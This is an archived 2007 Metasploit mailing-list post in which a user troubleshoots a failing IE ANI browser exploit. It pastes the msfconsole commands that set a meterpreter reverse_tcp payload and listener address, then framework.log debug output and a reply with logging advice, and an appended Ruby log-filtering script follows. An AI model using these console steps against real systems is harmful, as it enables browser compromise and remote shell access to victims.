Metasploit mailing list archives
favicon.ico handler & meterpreter reverse_tcp encoder problems
From: jlbrown1980 at comcast.net (jlbrown1980)
Date: Mon, 14 May 2007 12:44:00 -0400
Alright here is my log and a screenshot with what is going on. This is what was entered into the attacking shell..

_ _ _
| | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|

       =[ msf v3.1-dev
+ -- --=[ 192 exploits - 106 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 36 aux

msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(ani_loadimage_chunksize) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.1.105    yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH                   no        The URI to use for this exploit (default

Payload options:

   Name      Current Setting                              Required  Description
   ----      ---------------                              --------  -----------
   DLL       /usr/local/msf3/data/meterpreter/metsrv.dll  yes       The local pa
   EXITFUNC  process                                      yes       Exit techni
   LHOST     192.168.1.105                                yes       The local ad
   LPORT     4444                                         yes       The local po

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.105:8080/WGP0OVb7Z5YluSF
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >

This is the output in framework.log with LogLevel set to 3 from start to finish.

[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Ppc::LongXor from /usr/local/msf3/modules/encoders/ppc/longxor.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Ppc::LongXorTag from /usr/local/msf3/modules/encoders/ppc/longxor_tag.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Sparc::LongXorTag from /usr/local/msf3/modules/encoders/sparc/longxor_tag.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::NonUpper from /usr/local/msf3/modules/encoders/x86/nonupper.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::ShikataGaNai from /usr/local/msf3/modules/encoders/x86/shikata_ga_nai.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AlphaUpper from /usr/local/msf3/modules/encoders/x86/alpha_upper.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::FnstenvMov from /usr/local/msf3/modules/encoders/x86/fnstenv_mov.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::UnicodeUpper from /usr/local/msf3/modules/encoders/x86/unicode_upper.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::JmpCallAdditive from /usr/local/msf3/modules/encoders/x86/jmp_call_additive.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::Call4Dword from /usr/local/msf3/modules/encoders/x86/call4_dword_xor.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::NonAlpha from /usr/local/msf3/modules/encoders/x86/nonalpha.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AvoidUtf8 from /usr/local/msf3/modules/encoders/x86/avoid_utf8_tolower.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::UnicodeMixed from /usr/local/msf3/modules/encoders/x86/unicode_mixed.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::Countdown from /usr/local/msf3/modules/encoders/x86/countdown.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AlphaMixed from /usr/local/msf3/modules/encoders/x86/alpha_mixed.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::Generic::None from /usr/local/msf3/modules/encoders/generic/none.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::Cmd::GenericSh from /usr/local/msf3/modules/encoders/cmd/generic_sh.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Ppc::Simple from /usr/local/msf3/modules/nops/ppc/simple.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Sparc::Vlad902 from /usr/local/msf3/modules/nops/sparc/random.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::X86::SingleByte from /usr/local/msf3/modules/nops/x86/single_byte.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::X86::Opty2 from /usr/local/msf3/modules/nops/x86/opty2.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Php::Generic from /usr/local/msf3/modules/nops/php/generic.rb.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module encoder/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module payload/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module exploit/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(2)] core: Loading from file /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
[05/14/2007 12:26:31] [i(2)] core: Loaded exploit module Msf::Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 from /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module nop/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module auxiliary/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module encoder/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module payload/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(2)] core: Loading from file /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb
[05/14/2007 12:26:45] [i(2)] core: Loaded payload module Msf::Payloads::Stagers::Windows::ReverseTcp from /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb.
[05/14/2007 12:26:45] [d(2)] core: Loading from file /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb
[05/14/2007 12:26:45] [i(2)] core: Loaded payload module Msf::Payloads::Stages::Windows::Meterpreter from /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb.
[05/14/2007 12:26:45] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[05/14/2007 12:26:45] [d(2)] core: Built staged payload windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [w(3)] core: Missing value for payload offset LHOST, skipping.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module exploit/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module nop/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module auxiliary/windows/meterpreter/reverse_tcp.

Screenshot of activity
http://img385.imageshack.us/my.php?image=screenshotde0.png

So that's where I'm at, still can't figure out why it's not loading the exploit properly.

Kurt Grutzmacher <grutz[at]jingojango.net> wrote:
It would probably be a lot easier to SSH into your unix box from the Windows platform. You'll not have to walk as often and then be able to troubleshoot tons faster.

Copy/paste your msfconsole session. Also do a "setg LogLevel 3", close and re-open msfconsole and run the exploit again. Check ~/.msf/logs/framework.log for errors.
--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070514/987873f6/attachment.htm>
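
Added example (not part of either poster's message, and not Metasploit's own code): a small Ruby filter for the framework.log line format quoted above, which separates warnings and errors from the module-loading noise at LogLevel 3. The 'e' severity letter and the handling of unprefixed continuation lines are assumptions; the sample lines are copied from the log in this post.

```ruby
# Triage a framework.log by severity. Line format as quoted in this post:
#   [MM/DD/YYYY HH:MM:SS] [<severity>(<level>)] <source>: <message>
LOG_LINE = %r{\A\[(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\] \[(\w)\((\d)\)\] (\w+): (.*)\z}

Entry = Struct.new(:time, :severity, :level, :source, :message)

# Parse log text into entries. Non-blank lines without the prefix are
# appended to the previous entry (assumption: multi-line messages such
# as backtraces are written that way).
def parse_log(text)
  entries = []
  text.each_line do |raw|
    line = raw.chomp
    if (m = LOG_LINE.match(line))
      entries << Entry.new(m[1], m[2], m[3].to_i, m[4], m[5])
    elsif entries.any? && !line.strip.empty?
      entries.last.message << "\n" << line.strip
    end
  end
  entries
end

# Entries worth reading first. 'w' appears in the log above;
# 'e' for errors is an assumption.
def problems(entries, wanted = %w[w e])
  entries.select { |e| wanted.include?(e.severity) }
end

# Count entries per severity letter, to see how much is noise.
def severity_counts(entries)
  entries.group_by(&:severity).transform_values(&:size)
end

# Sample lines copied from the log quoted in this post.
SAMPLE = <<~'LOG'
  [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::Generic::None from /usr/local/msf3/modules/encoders/generic/none.rb.
  [05/14/2007 12:26:45] [d(1)] core: Demand loading module payload/windows/meterpreter/reverse_tcp.
  [05/14/2007 12:26:45] [d(2)] core: Built staged payload windows/meterpreter/reverse_tcp.
  [05/14/2007 12:26:45] [w(3)] core: Missing value for payload offset LHOST, skipping.
LOG

if __FILE__ == $PROGRAM_NAME
  # Pass the log path (e.g. ~/.msf/logs/framework.log) or fall back to SAMPLE.
  text = ARGV[0] ? File.read(File.expand_path(ARGV[0])) : SAMPLE
  entries = parse_log(text)
  puts "severity counts: #{severity_counts(entries)}"
  problems(entries).each { |e| puts "#{e.time} #{e.severity}(#{e.level}) #{e.source}: #{e.message}" }
end
```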